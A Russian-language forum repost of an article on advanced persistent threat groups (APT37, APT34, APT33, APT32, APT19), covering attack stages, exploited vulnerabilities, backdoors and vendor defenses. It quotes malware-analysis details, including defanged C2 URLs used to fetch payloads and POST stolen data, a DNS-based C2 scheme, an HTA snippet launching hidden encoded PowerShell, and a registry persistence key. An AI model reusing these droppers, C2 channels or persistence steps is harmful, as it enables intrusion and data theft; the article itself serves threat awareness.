APT. Продвинутые атаки, хитрости и методы защиты.

Tartuga

Бывалый
ПРОВЕРЕННЫЙ ПРОДАВЕЦ
PREMIUM USER

Tartuga

Бывалый
ПРОВЕРЕННЫЙ ПРОДАВЕЦ
PREMIUM USER
Регистрация
7 Фев 2020
Сообщения
525
Реакции
98
Репутация
147
Наверняка ты читал о масштабных сетевых атаках, от которых пострадали банки, крупные предприятия, госучреждения и даже военные объекты. Кто их проводит? Почему они оказываются столь разрушительными? Можно ли от них защититься? На эти вопросы мы постараемся ответить в этой статье.

Появление и эволюция APT.
Примерно с 2004 года команда реагирования на компьютерные инциденты в Lockheed Martin (LM-CIRT) стала использовать термин APT (Advanced Persistent Threat) в своих

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

. Так стали называть сложные атаки, выполняемые преимущественно на ИТ-инфраструктуру военных и государственных объектов. Как правило, в их проведении подозревали спецслужбы других стран и отряды «правительственных хакеров». Затем с легкой руки журналистов понятие APT

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

до многоуровневых атак, целью которых может быть сеть любой организации или группа устройств с общими признаками. Даже сейчас термин APT остается неоднозначным. Его переводят как «развитая устойчивая угроза» или «сложная постоянная угроза», подразумевая то многоэтапный сценарий атаки, то используемые в ней инструменты, а то и вовсе мощные хакерские группы.

В Sophos тоже отмечают, что до сих пор

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

, позволяющих относить ту или иную атаку именно к APT. Успешные целенаправленные атаки зачастую выполняются с использованием старых наборов эксплоитов, поэтому 0day-уязвимости — не обязательный атрибут APT.

Другой часто выделяемый критерий APT — рассылка фишинговых писем для компрометации учетной записи рядового сотрудника компании. Затем она используется как точка входа в локальную сеть и плацдарм для перехода на следующий уровень — к компьютерам руководителей и серверам компании. Однако методы социального инжиниринга и так сверхпопулярны, поэтому было бы странно выделять их как маркер «сложной постоянной угрозы». На что же стоит ориентироваться?

Признаки APT.
Анализируя отчеты разных специалистов по безопасности, я сформулировал для себя следующие критерии APT (буду рад, если ты уточнишь и дополнишь их в комментариях):

  • это всегда целенаправленная атака. Целью обычно выступает не конкретный человек или организация, а какой-то более общий сегмент (например, финансовые учреждения) или однородная группа людей (постояльцы отеля, болельщики на стадионе, пассажиры круизного лайнера);
  • это долговременная атака. Она может длиться не один месяц и продолжаться до победного конца или утраты целесообразности;
  • это хорошо финансируемая атака. Даже банальный DDoS — затратная процедура, если продолжается длительное время;
  • это многостадийная атака. В APT последовательно используется несколько векторов и разных техник. Сами по себе они могут быть примитивны, интересно именно их сочетание. Например, секретарше шлют фишинговые письма, чтобы скомпрометировать ее корпоративную учетку и через нее (как от доверенного лица) отправить зараженный документ на ноутбук шефа;
  • APT не останавливают отдельные инструменты безопасности (антивирус, файрвол, спам-фильтры, простые SIEM-системы), и она долго может оставаться незамеченной либо протекать под маской отдельных типовых инцидентов. Важнее то, что аномальное поведение сети или отдельных устройств сохраняется, хотя при рутинных проверках ничего подозрительного не находится;
  • в ходе APT часто (но не обязательно) используют продвинутые техники, эффективно маскирующие их компоненты от типовых систем защиты. Например, reverse shell для обхода МСЭ.
По данным

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

, в APT используются следующие техники (перечислены в порядке убывания частоты применения): фишинг и социальный инжиниринг, DDoS и ботнеты, уязвимости нулевого дня и использующие их продвинутые зловреды, традиционные зловреды, скомпрометированные устройства, атаки инсайдеров, атаки уровня приложений.

Этапы APT.
В любой атаке уровня APT можно выделить семь ключевых этапов (иногда сокращают до пяти, объединяя шаги):

  1. Пассивный сбор информации (идентификация и отбор целей из открытых источников).
  2. Первичное заражение (заманивание на фишинговые сайты, рассылка инфицированных документов).
  3. Доставка боевой нагрузки (drive-by-загрузки, использование уязвимостей в браузере и его плагинах).
  4. Активная фаза (повышение привилегий и обход защитных систем с целью получения дополнительных данных о системе и закрепления в ней основных вредоносных компонентов).
  5. Получение удаленного контроля (внедрение бэкдоров, кейлоггеров и установка обратных шеллов).
  6. Связь с управляющими серверами в ожидании дальнейших команд (обход файрволов, использование для передачи команд различных мессенджеров, клиентов соцсетей и популярных сетевых API).
  7. Достижение конечной цели (кража данных, выполнение незаконных финансовых транзакций, формирование ботнета, перехват контроля над АСУ ТП и так далее).

Злодей зиродей.
Эффективность APT-атак существенно возрастает, когда используются уязвимости, для которых еще нет патча. К примеру, по данным специалистов компании 360 Core Security, в одной из недавних атак группа APT-C-06 использовала 0day-эксплоит

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

для движка VBScript. Он затрагивает Internet Explorer в Windows 7–10 и серверных платформах любой разрядности, начиная с Windows Server 2012 R2.

Когда открывают фишинговую ссылку или документ MS Office c вредоносным элементом управления ActiveX, происходит сбой в работе VBScript, в результате чего подменяется тип объектов в памяти и права доступа к ним. Так у атакующего появляется возможность удаленно выполнить произвольный код в обход существующих систем защиты. Дополнительно APT-C-06 использовала одну из популярных техник

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

.Подробный анализ CVE-2018-8174 читай

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

.

Другая группа, APT37 (Reaper), использовала в своих атаках начала 2018 года эксплоит для уязвимости нулевого дня в Adobe Flash Player

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

. Она затрагивает версии до 28.0.0.161 и связана с некорректной обработкой указателя в SDK Primetime. Успешная атака приводит к выполнению произвольного кода через подмену объектов в памяти процесса флеш-проигрывателя.

Современные APT.
Глобальная исследовательская и аналитическая группа «Лаборатории Касперского» (GReAT) подготовила свежий отчет

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

. Основные выводы из него я бы сформулировал так:

  • сейчас APT-группировки наращивают свою активность, и по числу атак доминируют азиатские;
  • наиболее мощная атака среди недавно зарегистрированных —

    Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

    . Вероятно, за ней стоит группа APT28 (aka Sofacy, Black Energy и еще over 9000 названий);
  • ранее обнаруженные APT-группы никуда не исчезли, а период затишья не говорит о прекращении их деятельности. Они могут выполнять небольшие операции, которые незаметны в глобальном масштабе, или же просто меняют формат и подбирают инструменты для новых атак. К примеру, вновь пробудилась группа APT27 (также известная как Emissary Panda и LuckyMouse);
  • общие компоненты, используемые в сетевых атаках разных APT-групп, позволяют утверждать о тесных взаимосвязях между ними. Например, ScarCruft и Darkhotel в своих атаках применяли один и тот же сайт для распространения эксплоитов, один из которых был 0day;
  • прослеживается явная связь между событиями мирового масштаба (зимние Олимпийские игры, переговоры по Северной Корее и саммит в Сингапуре) и векторами новых атак.
В конце 2017 года IDC Connect и Malwarebytes провели

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

среди руководителей (CIO, CTO и CSO) 200+ крупных (у 25% из них штат насчитывал свыше 5000 сотрудников) американских организаций. Они относились к разным отраслям (разработка ПО, строительство, здравоохранение, финансовые услуги). Из опрошенных 80% утверждали, что за прошлый год их компании пострадали от APT один или несколько раз.

Однако если ты обнаружил признаки сложной постоянной угрозы в своей сети, то это еще не означает, что она и была целью. При spear phishing копья (особенно азиатские) часто оказываются недостаточно острыми. Целились в кого-то, а зацепили тебя.


APT-группы.
Калифорнийская компания FireEye, известная как один из пионеров защиты от 0day-уязвимостей, не один год наблюдала за деятельностью хакерских группировок, проводящих мощные целенаправленные атаки. Схожий «почерк» и общие инструменты позволили FireEye выделить следующие ключевые группы.


Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.


Предположительно команда правительственных хакеров из Северной Кореи. Другие возможные названия: Group123, ScarCruft, RedEyes. Действует как минимум с 2012 года и в 2017–2018 годах стала особенно активной. Принадлежность к Северной Корее выдают IP-адреса, временные метки (UTC +8:30) и выбор зарубежных целей, явно отражающий изменения во внешней политике КНДР.

Основные цели: государственные и военные учреждения Южной Кореи, Японии, Китая и Вьетнама. Реже атакуют Индию. Вероятно, пару раз зацепили Кувейт, Россию и другие страны, но это похоже на случайность.

Хакеры APT37 часто атакуют системы SCADA на объектах химического производства, взламывают сети компаний из аэрокосмической отрасли, собирают персональные данные из баз данных медицинских учреждений. Пытаются украсть документацию о текущих хай-тек-разработках из сети профильных компаний и связанных с ними университетов.

За последние годы атаки APT37 стали более изощренными. Если раньше они использовали в основном методы социального инжиниринга, то сейчас в их арсенале появилось специализированное ПО (преимущественно бэкдоры) и наборы свежих эксплоитов, включая 0day.

Используемые инструменты:

  • JS-профайлер

    Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

    , определяющий версию браузера, его плагины и настройки для выбора способа доставки пейлоада;
  • утилита

    Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

    для скрытой доставки боевой нагрузки в виде зашифрованных архивов и образов;
  • бэкдор

    Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

    . Умеет перехватывать клавиатурные нажатия, записывать скриншоты и использовать API облачных хранилищ для подключения к своим управляющим серверам (C&C);
  • бэкдор

    Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

    . Действует на первом этапе атаки. Собирает системную информацию, после чего может отправлять и скачивать файлы. Также использует API облачных сервисов для связи с C&C. Распространялся через файлообменные сети под видом приложения для скачивания роликов с YouTube;
  • бэкдор

    Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

    также использует облачные API для получения команд от своего управляющего сервера. Он проникал на компьютеры жертв через таргетированные фишинговые письма и использовал

    Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

    для текстового процессора Hangul Word Processor, популярного в академических кругах Южной Кореи. Это еще один маркер целенаправленной атаки, поскольку в других странах формат документов HWPX, мягко говоря, непопулярен;
  • бэкдор

    Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

    . Основной канал распространения — таргетированный через взломанные сайты —

    Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

    . Использует AOL-мессенджер для связи с C&C, что выделяет его среди прочих зловредов;
  • бэкдор

    Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

    собирает информацию об ОС, софте и пользователе, после чего запускает на атакуемом хосте обратный шелл (Wine cmd.exe) для обхода NAT и файрвола;
  • сравнительно новый бэкдор

    Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

    , использовавший зиродей в Microsoft Office

    Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

    . Собирает данные о системе, делает скриншоты, по команде загружает и запускает на исполнение очередной зловред;
  • троян-даунлоадер

    Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

    . Использовался в 2016 году для атаки на финансовые учреждения. По команде загружает боевую нагрузку, а до этого собирает системную информацию и данные пользователя. Также отслеживает состояние функции

    Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

    , позволяющей назначить в Windows вызов произвольной программы вместо используемой по умолчанию (включая системные компоненты, вроде проводника и диспетчера процессов);
  • вспомогательные утилиты: SOUNDWAVE для скрытой записи с микрофона, RUHAPPY для заметания следов.
Основные техники APT37:

  • spear Phising, или таргетированный фишинг. Отличается от наспех сляпанных мошеннических писем для массовой рассылки убедительным персонализированным текстом, на который с высокой вероятностью «клюнет» определенная категория пользователей. Например, деканам южнокорейских университетов отправлялись письма о текущих грантах и научных публикациях с призывом к немедленным действиям (быстрее подтвердить участие, отправить заявку, уточнить реквизиты и подобное), чтобы они запустили вложение;
  • drive-by-загрузки. По ссылке из документа во вложении или с зараженного сайта происходит редирект на веб-страницу со скриптом, использующим эксплоит для скрытой загрузки зловредов;
  • запуск скачанной боевой нагрузки путем подмены ассоциаций файловых расширений или через уязвимости механизма Microsoft Dynamic Data Exchange;
  • использование AOL IM или API Dropbox и pCloud для связи с управляющими серверами ботнета;
  • скачивание боевой нагрузки по команде управляющего сервера и ее запуск через уязвимость в DDE или подмену файловых ассоциаций;
  • использование уязвимостей в специфических продуктах (например, в Hangul — южнокорейском аналоге MS Word);
  • использование уязвимостей нулевого дня в массовых продуктах (браузерный плагин Adobe Flash).
APT34.
Предположительно иранская группировка, с 2014 года атакующая широкий спектр целей на Среднем Востоке. Преимущественно занимается хищением средств со счетов зарубежных банков и промышленным шпионажем в химической и энергетической отрасли.

Самая масштабная атака с участием APT34 зафиксирована специалистами FireEye в мае 2016 года. Все началось с волны фишинговых писем, содержащих вредоносные приложения, которые были отправлены сразу в несколько банков. Это были документы MS Excel с макросами, но их все равно открыли из-за правдоподобно выглядящего сопроводительного текста. Письма содержали темы сообщений, связанные с ИТ-инфраструктурой (например, журнал отчета о статусе сервера или список компонентов Cisco Iron Port Appliance). В одном случае письмо даже продолжало реальный разговор по электронной почте между несколькими сотрудниками и содержало их валидные контактные данные.

Макрос вызывал функцию Init(), которая извлекала содержимое в кодировке Base64 из ячеек листа с заголовком Incompatible (имитация несовместимой версии документа). Затем он проверял наличие скрипта по адресу %PUBLIC%\Libraries\update.vbs. Если скрипта не было, то он начинал его создавать через PowerShell, формируя командлет %PUBLIC%\Libraries\dns.ps1. Затем макрос создавал запланированную задачу с именем GoogleUpdateTaskMachineUI с вызовом каждые три минуты. Из-за жестко заданной переменной %PUBLIC% макрос успешно выполнялся только в Windows Vista и более ранних версиях, но именно они зачастую и были установлены на целевых компьютерах. Дополнительно после успешного запуска макрос отображал контент ранее скрытых ячеек в присланном документе (через функцию ShowHideSheets()), просто чтобы успокоить пользователя и усыпить его бдительность.

На следующем этапе скрипт update.vbs использовал PowerShell для загрузки пейлоада. Он скачивал по обфусцированной ссылке hxxp://go0gIe[.]com/sysupdate.aspx?req=xxx\dwn&m=d и сохранял в каталог %PUBLIC%\Libraries\dn вредоносные компоненты, главным из которых была модифицированная утилита

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

для извлечения из оперативной памяти паролей залогиненных пользователей.

Затем он скачивал по ссылке hxxp://go0gIe[.]com/sysupdate.aspx?req=xxx\bat&m=dдругой командный файл (.bat), запускал его и сохранял результаты работы в соседнем каталоге %PUBLIC%\Libraries\up. Батник представлял собой простейший скрипт для сбора информации о пользователе и системе. Это был набор стандартных команд вроде whoami, hostname, ipconfig /all, net user.

На заключительном этапе создавался командлет dns.ps1, используемый для скрытой отправки файлов, а все собранные данные отправлялись на сервер hxxp://go0gIe[.]com/sysupdate.aspx?req=xxx\upl&m=u методом HTTP POST.

В этой атаке интересен метод скрытой связи с управляющим сервером через DNS-запросы. Протокол DNS вряд ли будет заблокирован файрволом, а его использование обычно не вызывает срабатывания поведенческих анализаторов. В начале работы командлет dns.ps1запрашивает через протокол DNS идентификатор с сервера go0gIe.Com. Затем этот идентификатор сохраняется в сценарии PowerShell, а на командный сервер отправляется следующий запрос для получения дополнительных инструкций. Если дальнейшие действия не требуются, то командлет завершается и будет активирован скриптом update.vbs снова через три минуты. Если от C&C-сервера пришла серия команд, то командлет начинает создавать батник по адресу %PUBLIC%\Libraries\tp\chr(xx)chr(yy).bat. Конкретные значения переменных, содержимое BAT-файла и управляющие команды кодируются как октеты IP-адресов. Например, ответ dns.ps1 управляющему серверу отправляется как IP-адрес с шаблоном 33.33.xx.yy, а получение им IP-адреса 35.35.35.35 означает конец действий.

Такие нетривиальные подходы всегда вызывают интерес специалистов по безопасности, а группа APT34 получила дополнительную известность еще и благодаря выполнению «бесфайловой» атаки. Недавно она использовала уязвимость

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

в Microsoft Office (2007 SP3 — 2016), позволявшую обойти антивирусы и прочие файловые анализаторы. При помощи эксплоита выполнялась инъекция кода в процесс Microsoft Word Equation Editor. Таким образом скрытно

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

размером до 17 Кбайт, не оставляя заметных следов в файловой системе.

APT33.
Предположительно еще одна иранская группа, созданная на базе

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

и действующая с 2013 года. В своих атаках APT33 использует имеющиеся в открытом доступе хакерские инструменты, проявляя особый интерес к предприятиям авиационного сектора и энергетической отрасли. Последняя крупная атака ведется APT33 с мая 2017 года. Она преимущественно нацелена на объекты военной авиации в Саудовской Аравии и южнокорейские нефтехимические компании.

Начало атаки было вполне классическим: рассылка фишинговых писем с тщательно подобранными темами и продуманным оформлением. Для их составления использовался инструмент ALFA TEaM Shell, позволяющий рассылать сотни таргетированных писем на основе полуавтоматических шаблонов. Об одном из подобных инструментов мы уже

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

. Использование ALFA TEaM Shell стало очевидно при анализе первой волны спам-рассылки: некоторые поля в ней содержали дефолтные значения, включая адрес [email protected]. Однако ошибку быстро исправили, и уже следующая рассылка выглядела аккуратно. В тексте ссылались на реальные вакансии и высокую зарплату и даже включали заявление о найме на работу от имени фиктивной компании Equal Opportunity. Для большей убедительности APT33 зарегистрировала несколько доменов, которые выглядят как принадлежащие Boeing, Northrop Grumman, Saudia Aerospace Engineering и другим известным компаниям.

APT33 отправила сотрудникам ряда компаний зараженные письма с предложением работы и со ссылками на вредоносное HTML-приложение (.hta). Файлы .hta часто используются на сайтах службы занятости для обработки запросов о доступных вакансиях. Сюрприз заключался во встроенном скрипте (см. фрагмент ниже).

<script>
a=new ActiveXObject("WScript.Shell");
a.run('%windir%\\System32\\cmd.exe /c powershell -window hidden -enc <redoctedencoded command>', 0);
</script>

Скрипт загружал бэкдор TURNEDUP, созданный для скрытой отправки скриншотов и собранных сведений о зараженном компьютере, а также загрузки дополнительных инструментов по команде управляющего сервера. Для обхода антивирусов бэкдор загружался не напрямую, а через троян-дроппер DROPSHOT. В нем использовались продвинутые методы защиты от эвристического анализа. Часть кода была вынесена во внешние скрипты, а его установка и дальнейшая работа защищалась собственными драйверами. Предположительно это модификация дроппера, разработанного другой иранской APT-группой (SHAMOON, aka Disttrack). Подобный вариант ранее использовался ими для доставки бэкдора SHAPESHIFT и вайпера

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

. Последний просто стирал все данные с зараженного компьютера, то есть это уже был не шпионаж, а саботаж.

Среди других инструментов APT33 были замечены еще две сторонние разработки: продающаяся в даркнете программа удаленного доступа (RAT) NANOCORE с поддержкой плагинов и бэкдор NETWIRE, ориентированный на хищение данных.

APT32 (OceanLotus).
Xакерская группа, атакующая преимущественно иностранные компании, инвестирующие в развитие производства на территории Вьетнама. Основные отрасли — ретейл, консалтинг и гостиничный сектор. Такой выбор целей неясен, как и мотивы. По мнению специалистов FireEye, APT32 действует в интересах правительства Вьетнама. Атаки могли выполняться для сбора информации правоохранительными органами. Также это могло быть обычное хищение интеллектуальной собственности или даже своеобразные меры по борьбе с коррупцией и теневым бизнесом. Так или иначе, деятельность APT32 в конечном итоге подрывала конкурентное преимущество выбранных ими организаций.

Сами атаки не отличаются технической сложностью. Это все та же попытка заставить пользователя выполнить вредоносный макрос методами социального инжиниринга. Одним показывается сообщение о мнимой необходимости разрешить макросы для отображения отсутствующего шрифта, а другим — произвольные коды ошибок в Hex-формате и куча алертов «Включите макросы!». Как ни странно, столь грубый метод оказался довольно действенным.

В зависимости от сценария атаки макрос запускает одну или несколько вредоносных программ:

  • BEACON — выполняет инжект произвольного кода в запущенные процессы. Собирает сведения об учетных данных пользователей. Импортирует сеансовые мандаты Kerberos. Может использовать Metasploit framework;
  • KOMPROGO — полнофункциональный бэкдор, скрыто выполняющий действия с реестром и файловой системой. Может запускать обратный шелл. Также собирает и отправляет информацию о зараженной системе;
  • PHOREAL — бэкдор, создающий обратный шелл и поддерживающий связь с командным сервером через ICMP;
  • SOUNDBITE — бэкдор, устанавливающий связь с управляющим сервером с помощью закодированных DNS-запросов. Умеет собирать данные о системе и пользователях, создавать и отправлять файлы, а также вносить изменения в реестр;
  • WINDSHIELD — бэкдор, использующий методы противодействия отладке. Устанавливает связь с C&C через TCP raw sockets. Рандомно выбирает один из управляющих четырех серверов и шести портов. Собирает максимально подробную информацию о системе и протоколирует любые изменения в реестре или файловой системе. Может выгружать из памяти другие процессы, включая некоторые антивирусы.
Дополнительно в атаках APT32 использовалась уязвимость организации запуска драйверов режима ядра

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

. Она актуальна для большинства версий Windows (от Vista SP2 до 10.1607) и позволяет запускать вредоносный код с повышенными привилегиями.

APT19 (C0d0so0 Team).
Предположительно китайская хакерская группировка, состоящая из фрилансеров, действующих в интересах правительства КНР. В 2010 году взломала сайт Комитета Нобелевской премии мира в Норвегии, чтобы распространять через него бэкдоры методом watering hole, а в 2014 году повторила эту же методику с сайтом Forbes.com. При посещении скомпрометированных сайтов браузер подгружал вредоносный скрипт с другого, и выполнялась drive-by-загрузка малвари.

В 2017 году APT19 атаковала австралийские юридические фирмы, чтобы получить бизнес-информацию об их международных клиентах, дающую китайским компаниям конкурентное преимущество. Тогда она использовала три разные наживки для spear-phishing. В начале мая фишинговыми приманками служили документы в формате RTF, которые загружали пейлоад через уязвимость нулевого дня в Microsoft Office —

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

. К концу мая APT19 переключилась на использование электронных таблиц Excel (XLSM) с поддержкой макросов. Позже APT19 добавила непрямой вызов зараженных документов XLSM, и по крайней мере одна из новых приманок доставляла модификацию бэкдора BEACON под названием Cobalt Strike.

Параллельно бэкдоры семейства Derusbi доставлялись в систему под видом кейгена для платной версии антивируса AVG. При запуске они создавали два файла: %LOCALAPPDATA%\dbgeng.dll (троянский компонент) и %LOCALAPPDATA%\fakerx86.exe(символический отладчик Windows). Далее он проверяет, что запущен не в контексте rundll32.exe (то есть не в песочнице и не в отладчике). Если проверка выполнена успешно, то в реестре создается ключ HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows Debug Tools – %LOCALAPPDATA%\fakerx86.exe и устанавливается связь с командным сервером.

На C&C методом HTTP POST отправляется лог с информацией о системе (IP- и MAC-адреса, имя пользователя и компьютера, сведения об аппаратной части) в кодировке Base64. В ответ сервер присылает дальнейшие команды, закодированные в параметре background-colorфейковой веб-страницы. Для их выполнения он также может передать дополнительные компоненты.

Защита.
Антивирусные компании уже много лет наперебой предлагают свою защиту от APT. У большинства она мало чем отличается от набора традиционных средств для анализа трафика, файловой системы и запущенных процессов. Просто под вывеской Anti-APT их стало легче продавать.

Насколько мне известно, эффективных методов противодействия APT пока не существует. Снизить ущерб от них поможет разумная осторожность (см. тренинги по безопасности) и следующие технические решения от крупных вендоров.


Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.


Включает в себя систему защиты от целевых атак Kaspersky Anti Targeted Attack (находит аномалии в сетевом трафике, изолирует подозрительные процессы и прослеживает связи между событиями) и решение Kaspersky Endpoint Detection and Response (отвечает за сбор и визуальное представление собранных данных).


Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.


Использует концепцию контрольных точек, отслеживая изменения по основным векторам APT-атак. Ищет аномалии в почтовом трафике и сетевой активности приложений. Широко использует песочницы для изоляции процессов и проверки файлов, загружаемых по сети. Применяет репутационный анализ и технологии облачной проверки. Может быть интегрирована со сторонними SIEM-системами.


Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.


Продвинутая SIEM-система, использующая ИИ IBM Watson для раннего обнаружения APT-атак и вычисления их источника.


Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.


Еще одна продвинутая SIEM с технологиями машинного обучения. Интегрированное решение для анализа сетевого трафика, поведенческого анализа, контроля поведения конечных точек и поиска взаимосвязи между выявленными отклонениями.


Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.


Подписка на аналитические отчеты о текущих атаках с их детальным описанием и рекомендациями по противодействию выявленным APT. Ее ведением занимается более 150 специалистов, а визуализация данных выполняется через веб-интерфейс и собственные API FireEye.
 
Последнее редактирование:
Сверху